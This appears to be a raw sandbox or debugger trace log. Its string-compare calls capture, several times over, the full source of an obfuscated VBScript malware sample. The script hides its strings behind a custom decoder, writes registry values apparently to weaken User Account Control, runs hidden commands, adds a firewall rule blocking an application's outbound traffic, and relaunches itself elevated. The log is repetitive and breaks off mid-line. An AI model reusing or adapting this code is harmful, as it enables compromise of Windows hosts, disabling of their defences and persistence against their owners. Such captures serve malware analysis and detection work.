bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 55 [0222.924] wcsncmp (_String1="im sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 92 [0222.924] wcsncmp (_String1="m sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 96 [0222.924] wcsncmp (_String1=" sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 19 [0222.924] wcsncmp (_String1="sdfheCHAVE7\r\nindex = 0\r\nsdfheCHAVE7 = 1\r\nkey = \"chave\"\r\nid = 10\r\nFunction bmw(s1)\r\nDim sx, x, x4, sr\r\nsr = \"\"\r\nsx = \"\"\r\nx = 0\r\nx4 = asc(Mid(s1,1,1)) - 65\r\ns1 = Mid(s1,2,Len(s1)-1)\r\n\x09while (Len(s1) > 0)\r\n\x09\x09sr = sr + chr((asc(Mid(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, 